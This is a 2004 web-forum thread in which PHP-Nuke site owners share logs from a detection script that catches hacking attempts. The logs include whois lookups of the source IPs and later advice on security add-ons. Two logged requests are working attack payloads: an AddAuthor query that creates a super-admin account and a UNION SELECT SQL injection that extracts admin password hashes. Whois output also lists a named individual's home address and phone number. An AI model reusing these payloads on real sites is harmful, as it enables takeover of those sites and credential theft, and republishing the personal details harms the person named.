Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script
Author Message
sharlein
Member Emeritus


Joined: Nov 19, 2002
Posts: 322
Location: On the Road

PostPosted: Wed Mar 31, 2004 9:58 am Reply with quote

Quote:
80.55.93.226

OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NL

ReferralServer: Only registered users can see links on this board! Get registered or login!

NetRange: 80.0.0.0 - 80.255.255.255
CIDR: 80.0.0.0/8
NetName: 80-RIPE
NetHandle: NET-80-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH62.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at Only registered users can see links on this board! Get registered or login!
RegDate:
Updated: 2004-03-16

OrgTechHandle: RIPE-NCC-ARIN
OrgTechName: RIPE NCC Hostmaster
OrgTechPhone: +31 20 535 4444
OrgTechEmail: Only registered users can see links on this board! Get registered or login!



DOCUMENT_ROOT :public_html
HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*
HTTP_ACCEPT_ENCODING : gzip, deflate
HTTP_ACCEPT_LANGUAGE : pl
HTTP_CONNECTION : Keep-Alive
HTTP_COOKIE : lang=english
HTTP_HOST :
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
PATH : /sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
REMOTE_ADDR : 80.55.93.226
REMOTE_PORT : 1864
SCRIPT_FILENAME : html/hackattempt.php
SERVER_ADDR :
SERVER_ADMIN :
SERVER_NAME :
SERVER_PORT :
SERVER_SIGNATURE : Apache/1.3.29 Server at Port 80

SERVER_SOFTWARE : Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.3 FrontPage/5.0.2.2634 mod_ssl/2.8.16 OpenSSL/0.9.7a
GATEWAY_INTERFACE : CGI/1.1
SERVER_PROTOCOL : HTTP/1.1
REQUEST_METHOD : GET
QUERY_STRING : op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala%20hot%20ee&add_radminsuper=1
REQUEST_URI : /Nuke/html/hackattempt.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala%20hot%20ee&add_radminsuper=1
SCRIPT_NAME : html/hackattempt.php
PATH_TRANSLATED : html/hackattempt.php
PHP_SELF : html/hackattempt.php
argv : Array
argc : 1


_________________
Give Me Ambiguity Or Give Me Something Else! 
View user's profile Send private message
64bitguy
The Mouse Is Extension Of Arm


Joined: Mar 06, 2004
Posts: 1159
Location: Sanbornton, NH USA

PostPosted: Mon Apr 05, 2004 12:27 am Reply with quote

This one busted by RavenScript Tonight.

The Proxy reported by the Script was:
Quote:
80.80.128.163
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NL

ReferralServer: Only registered users can see links on this board! Get registered or login!

NetRange: 80.0.0.0 - 80.255.255.255
CIDR: 80.0.0.0/8
NetName: 80-RIPE
NetHandle: NET-80-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH62.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at Only registered users can see links on this board! Get registered or login!
RegDate:
Updated: 2004-03-16

OrgTechHandle: RIPE-NCC-ARIN
OrgTechName: RIPE NCC Hostmaster
OrgTechPhone: +31 20 535 4444
OrgTechEmail: Only registered users can see links on this board! Get registered or login!



HTTP_X_FORWARDED_FOR : 80.80.133.68
REMOTE_ADDR : 80.80.128.163
REMOTE_PORT : 53987 SCRIPT_FILENAME : /hackattempt.php
SERVER_NAME : Only registered users can see links on this board! Get registered or login!
SERVER_PORT : 80
SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php


A closer look at the IP address forwarded by the Proxy in this attack (80.80.133.68) revealed:
Quote:

inetnum: 80.80.133.64 - 80.80.133.95
netname: ANGELSOFT-FORCE
descr: Force computer club IP addresses
country: BG
admin-c: STB1-RIPE
tech-c: AN767-RIPE
status: ASSIGNED PA
notify: Only registered users can see links on this board! Get registered or login!
mnt-by: AS12829-MNT
changed: Only registered users can see links on this board! Get registered or login! 20011101
source: RIPE

route: 80.80.132.0/22
descr: Angelsoft's clients aggregated route
origin: AS12829
notify: Only registered users can see links on this board! Get registered or login!
notify: Only registered users can see links on this board! Get registered or login!
mnt-by: AS12829-MNT
changed: Only registered users can see links on this board! Get registered or login! 20020724
source: RIPE

role: Angelsoft NOC
address: 5 Kostaki Peev Str.
address: Plovdiv 4000
address: Bulgaria
phone: +359 32 635 211
fax-no: +359 32 638 209
e-mail: Only registered users can see links on this board! Get registered or login!
e-mail: Only registered users can see links on this board! Get registered or login!
trouble: visit Only registered users can see links on this board! Get registered or login!
trouble: voice:
trouble: +359 32 635 211
trouble: +359 32 638 209
admin-c: AG5443-RIPE
tech-c: AY279-RIPE
nic-hdl: AN767-RIPE
remarks: This role object holds the handles of
remarks: supporting staff of AngelSoft ET
remarks: 5 Kostaki Peev Str.
remarks: Plovdiv
remarks: Bulgaria
notify: Only registered users can see links on this board! Get registered or login!
mnt-by: AS12829-MNT
changed: Only registered users can see links on this board! Get registered or login! 20010712
changed: Only registered users can see links on this board! Get registered or login! 20020919
changed: Only registered users can see links on this board! Get registered or login! 20030425
source: RIPE

person: Smilen Todorov Botev
address: 21 "Stoian Sredev"
address: Saedinenie
address: Plovdiv area
address: Bulgaria
phone: +359 88 964 794
e-mail: Only registered users can see links on this board! Get registered or login!
nic-hdl: STB1-RIPE
notify: Only registered users can see links on this board! Get registered or login!
notify: Only registered users can see links on this board! Get registered or login!
changed: Only registered users can see links on this board! Get registered or login! 20011101
source: RIPE

_________________
Steph Benoit Only registered users can see links on this board! Get registered or login!
1CMS, 100% Section 508 and W3C XHTML/CSS Compliant (Truly)

Last edited by 64bitguy on Thu Apr 08, 2004 6:05 pm; edited 3 times in total 
View user's profile Send private message Visit poster's website
64bitguy
PostPosted: Thu Apr 08, 2004 6:02 pm Reply with quote

Busted 217.219.75.92 / 216.148.246.70

Quote:
OrgName: CERFnet
OrgID: CERF
Address: 5738 Pacific Center Blvd
City: San Diego
StateProv: CA
PostalCode: 92121
Country: US

NetRange: 216.148.0.0 - 216.148.255.255
CIDR: 216.148.0.0/16
NetName: CERFNET-BLK-4
NetHandle: NET-216-148-0-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
NameServer: DBRU.BR.NS.ELS-GMS.ATT.NET
NameServer: CBRU.BR.NS.ELS-GMS.ATT.NET
NameServer: DMTU.MT.NS.ELS-GMS.ATT.NET
NameServer: CMTU.MT.NS.ELS-GMS.ATT.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 1998-12-03
Updated: 2000-03-09

TechHandle: CERF-HM-ARIN
TechName: AT&T Enhanced Network Services
TechPhone: +1-858-812-5000
TechEmail: Only registered users can see links on this board! Get registered or login!

OrgTechHandle: NETWO10-ARIN
OrgTechName: Network Provisioning
OrgTechPhone: +1-800-876-2373
OrgTechEmail: Only registered users can see links on this board! Get registered or login!



HTTP_VIA : 1.1 cssj3prx02.marketscore.com (NGP Diatom vfc3), 1.0 cssj3che01 (NetCache NetApp/5.2.1R1)
HTTP_X_FORWARDED_FOR : 217.219.75.92, 10.101.3.111
REMOTE_ADDR : 216.148.246.70
REMOTE_PORT : 20409 SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php
 
HauntedWebby
Involved
Involved


Joined: May 19, 2004
Posts: 363
Location: Ogden, UT

PostPosted: Thu May 20, 2004 9:56 am Reply with quote

Ravan caught one for me - May 19, 2004 10:19PM (MST)

Quote:
201.5.225.38




OrgName: Latin American and Caribbean IP address Regional Registry
OrgID: LACNIC
Address: Potosi 1517
City: Montevideo
StateProv:
PostalCode: 11500
Country: UY

ReferralServer: Only registered users can see links on this board! Get registered or login!

NetRange: 201.0.0.0 - 201.255.255.255
CIDR: 201.0.0.0/8
NetName: LACNIC-201
NetHandle: NET-201-0-0-0-1
Parent:
NetType: Allocated to LACNIC
NameServer: NS.LACNIC.NET
NameServer: NS2.DNS.BR
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
NameServer: SEC3.APNIC.NET
Comment: This IP address range is under LACNIC responsibility
Comment: for further allocations to users in LACNIC region.
Comment: Please see Only registered users can see links on this board! Get registered or login! for further details,
Comment: or check the WHOIS server located at whois.lacnic.net
RegDate: 2003-04-03
Updated: 2004-03-18

OrgTechHandle: LACNIC-ARIN
OrgTechName: LACNIC Hostmaster
OrgTechPhone: (+55) 11 5509-3522
OrgTechEmail: Only registered users can see links on this board! Get registered or login!



PATH : /usr/local/bin:/usr/bin:/bin
DOCUMENT_ROOT : /h*/l*/p*
HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
HTTP_ACCEPT_ENCODING : gzip, deflate
HTTP_ACCEPT_LANGUAGE : pt-br
HTTP_CONNECTION : Keep-Alive
HTTP_COOKIE : lang=english; msa_resolution=1024x768x32
HTTP_HOST : Only registered users can see links on this board! Get registered or login!
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
REMOTE_ADDR : 201.5.225.38
REMOTE_PORT : 1369
SCRIPT_FILENAME : /h*/l*/p*/hackattempt.php
SERVER_ADDR : 66.**.2**.73
SERVER_ADMIN : Only registered users can see links on this board! Get registered or login!
SERVER_NAME : Only registered users can see links on this board! Get registered or login!
SERVER_PORT : 80
SERVER_SOFTWARE : Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2634 mod_ssl/2.8.16 OpenSSL/0.9.7a PHP-CGI/0.1b
GATEWAY_INTERFACE : CGI/1.1
SERVER_PROTOCOL : HTTP/1.1
REQUEST_METHOD : GET
QUERY_STRING : name=nukejokes&file=print&jokeid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/**/limit/**/1/*
REQUEST_URI : /hackattempt.php?name=nukejokes&file=print&jokeid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/**/limit/**/1/*
SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php
argv : Array
argc : 1

 
View user's profile Send private message Send e-mail
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17077

PostPosted: Thu May 20, 2004 10:40 am Reply with quote

Cool
 
View user's profile Send private message
jamesmc
New Member
New Member


Joined: Dec 22, 2003
Posts: 21

PostPosted: Tue Jun 01, 2004 6:13 am Reply with quote

My site was hacked this weekend despite the script being in place and operational (tested as per Ravens Readme file). They must have found another way in. How I don't know as no report was generated and emailed.

Plastered all over the place was: ‘This Sait Hacked by Leroy Security Team’

Wouldn't be so bad of they could at least Spell!!

Are there any other security enhancements that you guys can recommend?

regards
James Mc
 
View user's profile Send private message
Raven
PostPosted: Tue Jun 01, 2004 6:27 am Reply with quote

This hack alert script is strictly for the UNION type attacks. Unless you have installed Chatserv's security fixes then you have been and are at risk. However, this script has been supplanted by Sentinel(tm) which is a comprehensive security application. You should install Sentinel immediately and then check your logs to discover what method the hackers used.
 
HauntedWebby
PostPosted: Tue Jun 01, 2004 9:47 am Reply with quote

I have all three (this script, chatserv & sentenal) and I went from being hacked once a week to not seeing anything.
 
jamesmc
PostPosted: Tue Jun 01, 2004 4:34 pm Reply with quote

Hi Raven

Thanks for the input. Much appreciated.

Keep up the good work..

regards
James Mc
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©